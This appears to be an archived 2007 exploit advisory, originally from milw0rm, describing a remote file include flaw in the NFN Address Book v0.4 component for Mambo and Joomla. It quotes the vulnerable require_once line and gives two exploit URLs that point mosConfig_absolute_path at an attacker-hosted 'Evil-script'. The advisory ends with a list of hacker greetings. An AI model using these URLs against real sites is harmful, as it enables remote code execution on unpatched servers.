Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16464
HistoryMar 25, 2007 - 12:00 a.m.

MAMBO & Joomla NFN Address Book v0.4 (nfnaddressbook.php) Remote File Include Vulnerabilities

2007-03-2500:00:00
vulners.com
15

######################################################

MAMBO & Joomla NFN Address Book v0.4 (nfnaddressbook.php) Remote File Include Vulnerabilities

######################################################

script : http://mamboxchange.com/frs/download.php/8191/com_nfn_addressbook.zip

######################################################

About : The NFN Address Book manages lists of contacts that can be split into groups and allows for hiding of private contacts.

Unlike other address books it is owned by a Mambo user but the contacts are NOT Mambo users.

######################################################

file : nfnaddressbook.php

######################################################

Found by & Contact : Cold z3ro , [email protected] , http://hack-teach.com/ , Team Hell Crew

######################################################

require_once ( $mosConfig_absolute_path . '/components/com_'._MISC_DB_PREFIX.'addressbook/functions.php' );

######################################################

Exploit :

this usege : http://www.example.com/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=Evil-script?

or : http://www.example.com/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=Evil-script?

######################################################

---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know

#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

milw0rm.com [2007-03-21]